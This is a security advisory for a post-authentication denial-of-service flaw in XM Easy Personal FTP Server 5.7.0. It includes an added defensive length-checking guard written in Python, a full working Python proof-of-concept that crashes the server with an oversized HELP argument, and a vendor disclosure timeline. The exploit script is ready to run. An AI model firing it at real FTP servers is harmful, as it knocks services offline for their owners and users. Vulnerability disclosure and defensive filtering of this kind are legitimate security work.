XM Easy Personal FTP Server is an easy-to-use FTP server application. Multiple denial of service vulnerabilities exist in XM Personal FTP Server that cause the application to crash when a long list of arguments is sent to certain FTP commands post authentication.
Credit:
The information has been provided by NeerajT.
Vulnerable Systems:
* XM Easy Personal FTP Server version 5.7.0 and prior
The DoS vulnerability exists because the application fails to handle large parameter values sent to certain FTP commands such as HELP or TYPE. When a long value (> 4700 bytes) is passed as a parameter to these commands, the FTP server cannot process it and crashes. Note that this is a post-authentication vulnerability, so a user must be logged in to exploit it. No registers are overwritten, hence remote code execution may not be possible.
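A defensive counterpart to the description above, as an added example that is not part of the original advisory or the vendor's code: a length guard that a proxy or monitor in front of the FTP server could apply to client commands before they reach it. The 512-byte argument limit, the 8-byte verb limit and the names FtpCommandGuard, MAX_ARG_LEN, MAX_VERB_LEN and ADVISORY_COMMANDS are assumptions; the advisory only states that values over 4700 bytes crash the server.

```python
# Added example: length guard for FTP control-channel commands (client -> server).
# MAX_ARG_LEN is an assumed policy limit, not a value from the advisory.
MAX_ARG_LEN = 512
MAX_VERB_LEN = 8                      # assumed upper bound for a command verb
ADVISORY_COMMANDS = {"HELP", "TYPE"}  # commands the advisory names


class FtpCommandGuard:
    """Incrementally parses client commands and flags oversized ones."""

    def __init__(self, max_arg_len=MAX_ARG_LEN):
        self.max_arg_len = max_arg_len
        self.max_line = MAX_VERB_LEN + 1 + max_arg_len
        self.buf = b""
        self.discarding = False  # skipping the tail of a line already reported

    def feed(self, chunk):
        """Return [(verdict, command, arg_len)] for the commands judged so far."""
        results = []
        self.buf += chunk
        while True:
            line, sep, rest = self.buf.partition(b"\r\n")
            if not sep:
                # No terminator yet: report early instead of buffering without bound.
                if not self.discarding and len(self.buf) > self.max_line:
                    results.append(self._judge(self.buf))
                    self.discarding = True
                if self.discarding:
                    # Keep a trailing CR so a CRLF split across chunks is still seen.
                    self.buf = b"\r" if self.buf.endswith(b"\r") else b""
                return results
            self.buf = rest
            if self.discarding:
                self.discarding = False
            elif line:
                results.append(self._judge(line))

    def _judge(self, line):
        verb, _, arg = line.partition(b" ")
        command = verb[:MAX_VERB_LEN].decode("ascii", "replace").upper()
        if len(arg) <= self.max_arg_len and len(verb) <= MAX_VERB_LEN:
            return ("allow", command, len(arg))
        verdict = "block-advisory" if command in ADVISORY_COMMANDS else "block"
        return (verdict, command, len(arg))
```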
Exploit:
-----------------------------------------------------
#!/usr/bin/python
#
# ::::::::::::::::::::::::::::::[neeraj(.)thakar(at)nevisnetworks(.)com]
#
# [-] What:....[ XM Easy Personal FTP Server 5.7.0 ].....
# [-] Where:...[ http://www.dxm2008.com ]................
# [-] When:....[ 14-May-2009 ]...........................
# [-] Who:.....[ NeerajT | neeraj(.)thakar(at)nevisnetworks(.)com ]....
# [-] How:.....[
#       A Denial of service vulnerability exists in XM
#       Personal FTP Server that causes the application to
#       crash when a long list of arguments is sent to
#       certain FTP commands post authentication..........]
# [-] Thankz:..[ Jambalaya, Xin and Chintan ]............

import os
import sys
import time
from ftplib import FTP


def usage():
    print "[...XM Personal FTP Server 5.7.0 DoS Exploit...]"
    print "[.........neeraj(.)thakar(at)gmail(.)com..............]\n"
    print "Usage: ./XMPersonal_FTPServer_DoSPoC.py <server-ip> <username> <password>\n"
    print "\n Use it at your own risk ! This is just a PoC. I am not responsible for damages done by your crazy thinking.. :P\n"


# The Main function starts here..
if __name__ == "__main__":
    ftpport = '21'

    # get the args.. (script name plus three arguments are required)
    if len(sys.argv) < 4:
        usage()
        sys.exit(1)

    ftpserver = sys.argv[1]
    user = sys.argv[2]
    passwd = sys.argv[3]

    print "Connecting to "+ftpserver+" using "+user+"....",

    # Try opening a connection to the FTP server
    try:
        F = FTP(ftpserver)
        F.timeout = 3
        if F:
            print 'Connected !'
    except:
        print "\nCould not connect to the Server :(\n"
        sys.exit(1)

    #Lets create the Buffer..
    crap = "A" * 5000

    # Creat'in da'bomb
    dabomb = 'HELP '+crap

    print "Press any key to login.."
    ch = sys.stdin.read(1)

    # Lets login
    try:
        F.login(user, passwd)
    except:
        print "Oops.. Looks like you forgot to create a login !!\n"
        F.quit()
        sys.exit(1)

    print "Target Locked, Press any key to fire..",
    ch = sys.stdin.read(1)

    print 'Sendin Da\'Bomb..'
    try:
        F.sendcmd(dabomb)
    except:
        print 'Target destroyed !! Mission successfull..!'

    print 'Returning to base..'
    F.close()
    sys.exit(0)
-----------------------------------------------------
Disclosure Timeline:
05.14.2009 - Vulnerability Discovered
05.15.2009 - Vendor Notified
05.20.2009 - No Response, Vendor Notified again
06.05.2009 - No Ack from Vendor, Public Disclosure